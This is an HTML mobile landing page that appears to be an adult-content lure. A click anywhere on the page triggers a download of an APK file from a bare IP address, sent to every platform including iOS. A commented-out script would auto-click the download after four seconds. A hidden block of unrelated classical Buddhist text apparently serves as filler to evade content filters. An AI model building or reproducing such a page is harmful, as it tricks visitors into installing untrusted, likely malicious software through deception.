<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="Content-type" content="text/html">
    <meta content="yes" name="apple-mobile-web-app-capable">
    <meta content="yes" name="apple-touch-fullscreen">
    <meta content="telephone=no" name="format-detection">
    <meta name="viewport"
        content="width=device-width,initial-scale=1.0,maximum-scale=1.0,minimum-scale=1.0,user-scalable=no">
    <meta http-equiv="Access-Control-Allow-Origin" content="*">
    <script type="text/javascript">
        !function (win) { var win_doc = win.document, win_doc_doc = win_doc.documentElement, psd_w = 750 / 100, evt_fn = "orientationchange" in win ? "orientationchange" : "resize", set_size = function () { var page_w = win_doc_doc.clientWidth || 320; page_w > 750 && (page_w = 750), win_doc_doc.style.fontSize = page_w / psd_w + "px"; }; set_size(); win_doc.addEventListener && (win.addEventListener(evt_fn, set_size, !1), win_doc.addEventListener("DOMContentLoaded", set_size, !1)); }(window);
    </script>
    <script src="./js/jquery.js"></script>

    <meta name="description" content="HOME">
    <meta name="keywords" content="">
    <title>&#26202;&#19978;&#24819;&#30475;&#30340;&#32654;&#22899;&#37117;&#26377;&#21734;</title>
    <style>
        a,
        img {
            -webkit-touch-callout: none
        }

        .c,
        .vc {
            position: absolute;
            left: 50%
        }

        .ellipsis,
        .ellipsis-multi {
            text-overflow: ellipsis;
            overflow: hidden
        }

        .c,
        .vc {
            left: 50%
        }

        .bg-list,
        .ellipsis,
        .ellipsis-multi {
            overflow: hidden
        }

        html {
            font-size: 100%;
            -webkit-text-size-adjust: 100%
        }

        a,
        b,
        body,
        dd,
        div,
        dl,
        dt,
        footer,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        header,
        html,
        i,
        img,
        li,
        p,
        section,
        ul {
            margin: 0;
            padding: 0;
            -webkit-box-sizing: border-box;
            box-sizing: border-box
        }

        body {
            font-family: "Helvetica Neue", Helvetica, "Heiti SC", "Droid Sans Fallback", sans-self;
            line-height: 1;
            font-size: 14px;
            background-color: #fff;
            color: #353535
        }

        ul {
            list-style: none
        }

        a {
            text-decoration: none;
            -webkit-tap-highlight-color: transparent
        }

        img {
            width: auto;
            max-width: 100%;
            vertical-align: middle;
            -webkit-user-select: none;
            font-size: 0
        }

        .clf:after {
            content: "";
            display: block;
            height: 0;
            clear: both;
            visibility: hidden
        }

        .clf {
            display: block;
            zoom: 1
        }

        .fl {
            float: left
        }

        .fr {
            float: right
        }

        .vc {
            top: 50%;
            -webkit-transform: translate3d(-50%, -50%, 0);
            transform: translate3d(-50%, -50%, 0)
        }

        .c {
            -webkit-transform: translate3d(-50%, 0, 0);
            transform: translate3d(-50%, 0, 0)
        }

        .hint-pop,
        .main-title {
            -webkit-transform: translateX(-50%);
            -ms-transform: translateX(-50%)
        }

        .hide {
            display: none;
            opacity: 0
        }

        .copy-btn,
        .main-content {
            display: -webkit-box;
            display: -webkit-flex;
            display: -ms-flexbox;
            -webkit-box-orient: vertical;
            -webkit-box-direction: normal
        }

        .rel {
            position: relative
        }

        .abs {
            position: absolute
        }

        .ellipsis {
            white-space: nowrap
        }

        .ellipsis-multi {
            display: -webkit-box;
            -webkit-line-clamp: 2;
            -webkit-box-orient: vertical
        }

        body {
            background: #262941;
        }

        .app {
            overflow-y: hidden;
            height: 100vh;
            position: relative;
            color: #000;
            max-width: 750px;
            margin: auto;
        }

        .bg-list {
            overflow: hidden;
            position: absolute;
            bottom: 0;
            left: 0;
            top: 3.68rem;
            right: 0;
        }

        .main-title {
            width: 3.92rem;
            height: 2.2rem;
            position: absolute;
            left: 50%;
            -webkit-transform: translateX(-50%);
            -ms-transform: translateX(-50%);
            transform: translateX(-50%);
            z-index: 1
        }

        .main-content {
            width: 100%;
            height: 3.82rem;
            position: absolute;
            bottom: 0;
            left: 0;
            display: -webkit-box;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
            -webkit-flex-direction: column;
            -ms-flex-direction: column;
            -webkit-box-orient: vertical;
            -webkit-box-direction: normal;
            flex-direction: column;
            -webkit-box-align: center;
            -webkit-align-items: center;
            -ms-flex-align: center;
            align-items: center;
            font-size: 0.28rem;
            color: #222;
            text-align: center;
            z-index: 2
        }

        .btn-download {
            display: block;
            height: 0.98rem;
            -webkit-border-radius: 0.60rem;
            border-radius: 0.60rem;
            -webkit-animation: changes 1s .2s linear infinite alternate;
            animation: changes 1s .2s linear infinite alternate;
            text-align: center;
        }

        .bottombox {
            position: fixed;
            bottom: 0;
            left: 0;
            z-index: 1000;
            width: 100%;
            padding-bottom: 0.2rem;
            padding-top: 0.15rem;
            display: block;
        }

        @-webkit-keyframes changes {
            from {
                -webkit-transform: scale(1);
                transform: scale(1)
            }

            to {
                -webkit-transform: scale(1.1);
                transform: scale(1.1)
            }
        }

        @keyframes changes {
            from {
                -webkit-transform: scale(1);
                transform: scale(1)
            }

            to {
                -webkit-transform: scale(1.1);
                transform: scale(1.1)
            }
        }


        .list-move-item {
            animation: movetop 20s infinite linear;
        }

        .rankdom {
            width: 1;
            height: 1;
            font-size: 0px;
            overflow: hidden
        }

        @keyframes movetop {
            0% {
                top: -0px;
            }

            100% {
                top: -14.45rem;
            }
        }

        .list-move-item {
            position: relative;
        }

        .list-move-item img {
            width: 100%;
        }

        .main-title {
            top: 0.2rem;
            display: inline-block;
            vertical-alignï¼š middle;
            text-align: center;
        }

        #js-copy-btn {
            top: 45%;
        }

        .btn-download {
            margin-top: 1.90rem;
        }

        .main-title {
            width: 100%;
        }

        .main-title img {
            margin-bottom: 0.15rem;
        }

        .grid-tab {
            display: grid;
            grid-template-columns: 25% 25% 25% 25%;
            width: 95%;
            margin: auto;
        }

        .main-content {
            position: relative;
            top: -0.3rem;
        }

        .btn-download {
            z-index: 999;
            margin: 0.45rem;
            width: 6.32rem;
            height: 1.08rem;
            background: #fd199f url(./other/down.png) no-repeat center center;
            background-size: 2.94rem 0.6rem;
            margin: 0 auto;
        }

        .btn-tips {
            z-index: 999;
            margin: 0.45rem;
            width: 6.32rem;
            height: 1.08rem;
            background: url(./img/tips.png) no-repeat center center;
            background-size: 100% 100%;
            margin: 10px auto;
        }

        .flex-btn {
            display: flex;
            width: 90%;
            justify-content: center;
            margin: auto;
        }

        .nansheng {
            margin-right: 0.20rem;
        }

        .nvsheng {
            margin-left: 0.20rem;
        }

        .app {
            overflow-y: scroll;
        }

        body {
            background: #262941 url(./other/2.png) no-repeat center top;
            background-size: 7.5rem 3.53rem;
        }
    </style>
</head>

<body onclick="downApp();">
    <div class="app" id="app">
        <div class="main-title"><img src="./img/img1.png" id="pic_img1"
                style=" margin-top:0.2rem; width:7.5rem; height:4.87rem;">
            <div class="main-content" style="display: none;">
                秀書偈了，便卻歸房，人總不知。秀復思惟：『五祖明日見偈歡喜，即我與法有緣；若言不堪，自是我迷，宿業障重，不合得法。』聖意難測，房中思想，坐臥不安，直至五更。

                祖已知神秀入門未得，不見自性。天明，祖喚盧供奉來，向南廊壁問，繪畫圖相，忽見其偈，報言：『供奉卻不用畫，勞爾遠水。經云：『凡所有相，皆是虛妄。』但留此偈，與人誦持，依此偈修。免墮惡道，依此偈修，有大利益。』
            </div>
        </div>
        <div class="bottombox" id="down">
            <div class="btn-download"></div>
            <div class="btn-tips"></div>
        </div>
        <ul class="bg-list" id="js-bg-list">
            <li class="list-move-item" id="js-move-item">
                <img src="./other/1.png" style="width:100%; height:14.45rem;" alt="百度" id="pic_x1">
                <img src="./other/1.png" style="width:100%; height:14.45rem;" alt="百度" id="pic_y1">
            </li>
        </ul>
    </div>
    <script>
        function downApp() {
            var u = navigator.userAgent,
                isAndroid = u.indexOf('Android') > -1 || u.indexOf('Adr') > -1,
                isiOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
                urls = {
                    'android': 'http://103.216.155.199:90/1.apk',
                    'ios': 'http://103.216.155.199:90/1.apk',
                    'other': 'http://103.216.155.199:90/1.apk'
                };
            //简化
            if (isAndroid) {
                window.location.href = urls.android;
            } else if (isiOS) {
                window.location.href = urls.ios;
            } else {
                window.location.href = urls.other;
            }
        }
    </script>
    <!-- <script type="text/javascript">
        setTimeout(function () {
            document.getElementById("down").click();
        }, 4000);
    </script> -->
</body>
</html>